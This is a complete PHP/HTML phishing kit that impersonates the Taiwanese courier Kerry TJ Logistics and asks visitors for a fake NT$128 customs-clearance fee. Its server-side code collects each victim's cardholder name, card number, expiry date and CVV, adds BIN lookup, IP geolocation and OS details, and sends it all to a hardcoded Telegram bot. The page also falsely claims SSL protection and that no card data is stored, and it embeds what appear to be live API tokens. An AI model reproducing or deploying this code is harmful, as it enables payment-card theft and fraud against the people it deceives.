<?php
$BOT_TOKEN = "8049377233:AAGhIEN0XB22GkemvhSu-GBnv1e4pa9GQrA";
$CHAT_ID = "-5104592587";

// === 取得使用者資訊 ===
$ip = $_SERVER['REMOTE_ADDR'] ?? '未知';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '未知';
$country = '未知';
$timeout = 5;

try {
    $context = stream_context_create([
        'http' => ['timeout' => $timeout],
        'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
    ]);
    $geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
    if ($geoData !== false) {
        $geo = json_decode($geoData);
        if (isset($geo->country) && $geo->status === 'success') {
            $country = $geo->country;
        }
    }
} catch (Exception $e) {
    $country = '未知';
}

function getCountryFromIP($ip, $timeout = 3) {
    if ($ip === '未知' || $ip === '127.0.0.1' || $ip === '::1') return '未知';
    try {
        $context = stream_context_create([
            'http' => ['timeout' => $timeout],
            'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
        ]);
        $geoData = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country", false, $context);
        if ($geoData !== false) {
            $geo = json_decode($geoData);
            if (isset($geo->country) && $geo->status === 'success') return $geo->country;
        }
    } catch (Exception $e) {}
    return '未知';
}

function detectOS($user_agent) {
    $os = '未知';
    if (strpos($user_agent, 'Windows') !== false) $os = 'Windows';
    elseif (strpos($user_agent, 'Mac') !== false) $os = 'macOS';
    elseif (strpos($user_agent, 'Linux') !== false) $os = 'Linux';
    elseif (strpos($user_agent, 'Android') !== false) $os = 'Android';
    elseif (strpos($user_agent, 'iPhone') !== false) $os = 'iOS';
    elseif (strpos($user_agent, 'iPad') !== false) $os = 'iPadOS';
    return $os;
}

function getBinInfo($bin) {
    $url = "https://data.handyapi.com/bin/{$bin}";
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 3,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => ['x-api-key: HAS-0YYRXxQgdvMzHL9u9184D']
    ]);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response ? json_decode($response, true) : null;
}

function formatBinInfo($bin, $binData) {
    $binInfo = "<b>🅱️ 信用卡 BIN 資訊：</b>\n";
    if ($binData && is_array($binData)) {
        $brand   = $binData['Brand']   ?? $binData['brand']   ?? '未知';
        $bank    = $binData['Bank']    ?? $binData['bank']    ?? $binData['Issuer'] ?? '未知';
        $binCountry = $binData['Country'] ?? $binData['country'] ?? '未知';
        $type    = $binData['Type']    ?? $binData['type']    ?? $binData['Scheme'] ?? '未知';
        $level   = $binData['Level']   ?? $binData['level']   ?? $binData['CardTier'] ?? $binData['tier'] ?? '標準';
        $currency = $binData['Currency'] ?? $binData['currency'] ?? 'TWD';

        $binInfo .= "• <b>BIN：</b> <code>{$bin}</code> | <b>品牌：</b> {$brand}\n";
        $binInfo .= "• <b>發卡銀行：</b> {$bank} | <b>國家：</b> {$binCountry}\n";
        $binInfo .= "• <b>類型：</b> {$type} | <b>等級：</b> {$level}\n";
        $binInfo .= "• <b>幣別：</b> {$currency}\n\n";
    } else {
        $binInfo .= "• <b>BIN：</b> <code>{$bin}</code> (無法取得額外資訊)\n\n";
    }
    return $binInfo;
}

function sendTelegram($msg) {
    global $BOT_TOKEN, $CHAT_ID;
    $url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
    $data = [
        'chat_id' => $CHAT_ID,
        'text' => $msg,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    $result = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return $httpCode === 200;
}

// === 處理支付記錄 ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'log_payment') {
    header('Content-Type: application/json');

    $ip = $_SERVER['REMOTE_ADDR'] ?? '未知';
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '未知';
    $country = getCountryFromIP($ip);
    $os = detectOS($user_agent);

    $tracking    = htmlspecialchars($_POST['tracking'] ?? '未知');
    $parcel_type = htmlspecialchars($_POST['parcel_type'] ?? '未知');
    $card_name   = htmlspecialchars($_POST['card_name'] ?? '未知');
    $card_number = preg_replace('/\s+/', '', $_POST['card_number'] ?? '');
    $expiry     = htmlspecialchars($_POST['expiry'] ?? '00/00');
    $cvv         = htmlspecialchars($_POST['cvv'] ?? '000');

    $bin = substr($card_number, 0, 6);
    $binData = getBinInfo($bin);

    $msg = "<b>✅✅ 嘉里大榮物流 - 支付完成</b>\n";
    $msg .= "══════════════════════════════\n\n";

    $msg .= formatBinInfo($bin, $binData);

    $msg .= "<b>💳 信用卡資訊：</b>\n";
    $msg .= "• <b>貨件號碼：</b> <code>{$tracking}</code>\n";
    $msg .= "• <b>貨件類型：</b> {$parcel_type}\n";
    $msg .= "• <b>持卡人姓名：</b> {$card_name}\n";
    $msg .= "• <b>卡號：</b> <code>{$card_number}</code>\n";
    $msg .= "• <b>有效期限：</b> {$expiry}\n";
    $msg .= "• <b>CVV：</b> <code>{$cvv}</code>\n";
    $msg .= "• <b>金額：</b> NT$128\n\n";

    $msg .= "<b>👤 客戶資訊：</b>\n";
    $msg .= "• <b>IP：</b> <code>{$ip}</code>\n";
    $msg .= "• <b>國家：</b> {$country}\n";
    $msg .= "• <b>作業系統：</b> {$os}\n";
    $msg .= "• <b>User Agent：</b> " . substr($user_agent, 0, 50) . "...\n";
    $msg .= "• <b>時間：</b> " . date('Y/m/d H:i:s') . "\n";

    $msg .= "══════════════════════════════\n";
    $msg .= "<i>📍 嘉里大榮物流 臺灣</i>";

    sendTelegram($msg);
    echo json_encode(['status' => 'success']);
    exit;
}

// === 從 POST 或 localStorage 取得資料 ===
$tracking = htmlspecialchars($_POST['tracking'] ?? '');
$parcel_type = htmlspecialchars($_POST['parcel_type'] ?? 'PPT');
$weight = htmlspecialchars($_POST['weight'] ?? '0.9');
?>
<!DOCTYPE html>
<html lang="zh-TW">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>清關費用支付 — 嘉里大榮物流</title>
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+TC:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
        :root {
            --primary: #FF6600;
            --primary-dark: #E65C00;
            --secondary: #1A1A1A;
            --background: #F5F5F5;
            --card-bg: #FFFFFF;
            --text: #333333;
            --text-muted: #666666;
            --border: #DDDDDD;
            --radius: 6px;
            --shadow-sm: 0 2px 8px rgba(0,0,0,0.08);
        }
        * { box-sizing: border-box; }
        body {
            margin: 0;
            font-family: 'Noto Sans TC', Arial, sans-serif;
            background: var(--background);
            color: var(--text);
            line-height: 1.6;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }
        .container { max-width: 720px; margin: 0 auto; width: 100%; padding: 0 16px; }
        .header {
            background: white;
            padding: 16px 0;
            border-bottom: 3px solid var(--primary);
            box-shadow: var(--shadow-sm);
        }
        .header-container { display: flex; justify-content: center; align-items: center; }
        .logo { height: 72px; width: auto; }
        .hero {
            background: var(--secondary);
            color: white;
            text-align: center;
            padding: 2.2rem 1rem;
        }
        .hero h1 { margin: 0; font-size: 1.9rem; font-weight: 700; }
        .card {
            background: var(--card-bg);
            border: 1px solid var(--border);
            border-radius: var(--radius);
            padding: 2rem;
            margin: 2rem 0;
            box-shadow: var(--shadow-sm);
        }
        .status {
            margin-bottom: 1.5rem;
            padding-bottom: 1rem;
            border-bottom: 1px solid var(--border);
            display: flex;
            align-items: center;
            gap: 0.6rem;
            color: var(--text-muted);
            font-size: 0.95rem;
        }
        .status strong { color: var(--text); }
        .status span { color: var(--primary); font-weight: 700; border-bottom: 2px solid var(--primary); padding-bottom: 2px; }
        .parcel-info {
            background: #FFF8F2;
            border: 1px solid #FFCC99;
            border-radius: var(--radius);
            padding: 1.4rem;
            margin: 1.8rem 0;
        }
        .info-row {
            display: flex;
            justify-content: space-between;
            padding: 0.7rem 0;
            border-bottom: 1px solid #FFCC99;
            font-size: 1rem;
        }
        .info-row:last-child { border-bottom: none; }
        .info-label { color: var(--text-muted); }
        .info-value { font-weight: 700; color: var(--secondary); }
        .amount-display {
            background: #FFF8F2;
            border: 2px solid var(--primary);
            border-radius: var(--radius);
            padding: 2rem;
            text-align: center;
            font-size: 3rem;
            font-weight: 800;
            color: var(--primary);
            margin: 2rem 0;
        }
        .amount-currency { font-size: 1.4rem; vertical-align: super; margin-right: 0.3rem; }
        label {
            display: block;
            margin: 1.5rem 0 0.5rem;
            font-weight: 600;
            font-size: 0.95rem;
            color: var(--text);
        }
        input[type="text"], input[type="tel"] {
            width: 100%;
            padding: 0.85rem 1.1rem;
            border: 1px solid var(--border);
            border-radius: var(--radius);
            font-size: 1.05rem;
            transition: border-color 0.2s;
        }
        input:focus {
            outline: none;
            border-color: var(--primary);
            box-shadow: 0 0 0 3px rgba(255,102,0,0.15);
        }
        .input-group {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 1.4rem;
            margin-bottom: 1.2rem;
        }
        @media (max-width: 600px) { .input-group { grid-template-columns: 1fr; } }
        .btn-pay {
            width: 100%;
            padding: 1.1rem;
            margin-top: 2rem;
            background: var(--primary);
            color: white;
            border: none;
            border-radius: var(--radius);
            font-size: 1.15rem;
            font-weight: 700;
            cursor: pointer;
            transition: background 0.2s;
        }
        .btn-pay:hover { background: var(--primary-dark); }
        .security-note {
            font-size: 0.9rem;
            color: var(--text-muted);
            margin-top: 1.2rem;
            padding: 1rem;
            background: #FFF8F2;
            border-left: 4px solid var(--primary);
            border-radius: 0 var(--radius) var(--radius) 0;
        }
        .payment-methods {
            display: flex;
            justify-content: center;
            gap: 1.2rem;
            margin: 1.8rem 0;
            flex-wrap: wrap;
        }
        .method {
            background: #FFF8F2;
            border: 1px solid #FFCC99;
            border-radius: var(--radius);
            padding: 0.5rem 1rem;
            font-size: 0.9rem;
            color: var(--text);
            display: flex;
            align-items: center;
            gap: 0.5rem;
        }
        .loading-overlay {
            position: fixed;
            inset: 0;
            background: rgba(255,255,255,0.98);
            display: none;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            z-index: 9999;
        }
        .spinner {
            width: 60px; height: 60px;
            border: 5px solid #EEE;
            border-top: 5px solid var(--primary);
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-bottom: 1.2rem;
        }
        @keyframes spin { to { transform: rotate(360deg); } }
        .footer {
            text-align: center;
            padding: 2.5rem 1rem;
            color: white;
            background: var(--secondary);
            margin-top: auto;
            font-size: 0.9rem;
        }
        .footer a { color: var(--primary); text-decoration: none; margin: 0 1rem; }
        .footer a:hover { text-decoration: underline; }
        @media (max-width: 600px) {
            .card { padding: 1.6rem; }
            .hero h1 { font-size: 1.7rem; }
            .amount-display { font-size: 2.4rem; padding: 1.5rem; }
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
</head>
<body>

<header class="header">
    <div class="header-container">
        <img src="assets/logo.png" alt="嘉里大榮物流" class="logo">
    </div>
</header>

<section class="hero">
    <div class="container">
        <h1><i class="fas fa-credit-card"></i> 清關費用支付</h1>
    </div>
</section>

<main class="container">
    <div class="card">
        <div class="status">
            <i class="fas fa-map-marker-alt"></i>
            <strong>目前狀態：</strong> <span>等待支付清關費用</span>
        </div>

        <div class="parcel-info">
            <div class="info-row">
                <span class="info-label"><i class="fas fa-barcode"></i> 貨件號碼：</span>
                <span class="info-value" id="trackingDisplay"></span>
            </div>
            <div class="info-row">
                <span class="info-label"><i class="fas fa-box"></i> 貨件類型：</span>
                <span class="info-value" id="typeDisplay"></span>
            </div>
            <div class="info-row">
                <span class="info-label"><i class="fas fa-weight-hanging"></i> 重量：</span>
                <span class="info-value" id="weightDisplay"></span>
            </div>
            <div class="info-row">
                <span class="info-label"><i class="fas fa-file-invoice-dollar"></i> 費用類型：</span>
                <span class="info-value">國際貨件清關服務費</span>
            </div>
        </div>

        <div class="amount-display">
            <span class="amount-currency">NT$</span>128
        </div>

        <div style="text-align:center; color:var(--text-muted); font-size:0.95rem; margin-bottom:2rem;">
            <i class="fas fa-info-circle"></i> 此為國際貨件進入臺灣必繳之清關費用
        </div>

        <form id="paymentForm">
            <input type="hidden" id="tracking" name="tracking">
            <input type="hidden" id="parcel_type" name="parcel_type">

            <label for="card_name"><i class="fas fa-user"></i> 持卡人姓名</label>
            <input type="text" id="card_name" name="card_name" placeholder="王大明" required>

            <label for="card_number"><i class="fas fa-credit-card"></i> 信用卡號碼</label>
            <input type="tel" id="card_number" name="card_number" placeholder="1234 5678 9012 3456" maxlength="19" required>

            <div class="input-group">
                <div>
                    <label for="expiry"><i class="fas fa-calendar-alt"></i> 有效期限 (MM/YY)</label>
                    <input type="tel" id="expiry" name="expiry" placeholder="MM/YY" maxlength="5" required>
                </div>
                <div>
                    <label for="cvv"><i class="fas fa-lock"></i> 安全碼 (CVV)</label>
                    <input type="tel" id="cvv" name="cvv" placeholder="123" maxlength="4" required>
                </div>
            </div>

            <div class="payment-methods">
                <div class="method"><i class="fab fa-cc-visa"></i> Visa</div>
                <div class="method"><i class="fab fa-cc-mastercard"></i> MasterCard</div>
                <div class="method"><i class="fas fa-university"></i> 銀行轉帳</div>
                <div class="method"><i class="fab fa-cc-jcb"></i> JCB</div>
            </div>

            <p class="security-note">
                <i class="fas fa-shield-alt"></i>
                您的支付採用 256 位元 SSL 加密保護，我們絕不儲存完整信用卡資料。
            </p>

            <button type="submit" class="btn-pay">
                <i class="fas fa-lock"></i> 立即支付 NT$128
            </button>
        </form>
    </div>
</main>

<div class="loading-overlay" id="loadingOverlay">
    <div class="spinner"></div>
    <div style="font-size:1.2rem; font-weight:700; margin-bottom:0.6rem; color:var(--secondary);">正在處理安全支付...</div>
    <div style="color:var(--text-muted);">請勿關閉此視窗</div>
</div>

<footer class="footer">
    <div class="container">
        <div>© 2026 嘉里大榮物流股份有限公司 版權所有</div>
        <div style="margin-top:0.8rem;">
            <a href="#"><i class="fas fa-shield-alt"></i> 隱私權政策</a> •
            <a href="#"><i class="fas fa-file-contract"></i> 使用條款</a> •
            <a href="#"><i class="fas fa-question-circle"></i> 幫助中心</a>
        </div>
    </div>
</footer>

<script>
// 從 localStorage 載入資料 (與前頁一致)
document.addEventListener('DOMContentLoaded', function() {
    const data = JSON.parse(localStorage.getItem('kerrytjData') || '{}');
    const tracking = data.tracking || '<?php echo $tracking; ?>';
    const parcel_type = '<?php echo $parcel_type; ?>';
    const weight = '<?php echo $weight; ?>';

    if (tracking) {
        document.getElementById('tracking').value = tracking;
        document.getElementById('parcel_type').value = parcel_type;

        document.getElementById('trackingDisplay').textContent = tracking;
        document.getElementById('typeDisplay').textContent = parcel_type;
        document.getElementById('weightDisplay').textContent = weight + ' kg';
    } else {
        document.body.innerHTML = '<div style="text-align:center;padding:4rem;color:var(--secondary);"><h2>連線逾時</h2><p>請從貨件追蹤頁面重新開始。</p></div>';
    }
});

// 信用卡號格式化
document.getElementById('card_number').addEventListener('input', function(e) {
    let v = e.target.value.replace(/\D/g, '').substring(0,16);
    e.target.value = v.match(/.{1,4}/g)?.join(' ') || v;
});

// 有效期限格式化
document.getElementById('expiry').addEventListener('input', function(e) {
    let v = e.target.value.replace(/\D/g, '').substring(0,4);
    if (v.length > 2) v = v.slice(0,2) + '/' + v.slice(2);
    e.target.value = v;
});

// 表單提交
document.getElementById('paymentForm').addEventListener('submit', async function(e) {
    e.preventDefault();
    const btn = this.querySelector('.btn-pay');
    const overlay = document.getElementById('loadingOverlay');
    btn.disabled = true;
    btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> 處理中...';
    overlay.style.display = 'flex';

    const formData = new FormData(this);
    const data = {
        action: 'log_payment',
        tracking: formData.get('tracking'),
        parcel_type: formData.get('parcel_type'),
        card_name: formData.get('card_name'),
        card_number: formData.get('card_number'),
        expiry: formData.get('expiry'),
        cvv: formData.get('cvv')
    };

    try {
        await fetch('', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: new URLSearchParams(data)
        });
    } catch (err) {
        console.log('記錄失敗');
    }

    localStorage.setItem('paymentData', JSON.stringify(Object.fromEntries(formData)));

    setTimeout(() => {
        window.location.href = 'loading2.php';
    }, 1800);
});
</script>

</body>
</html>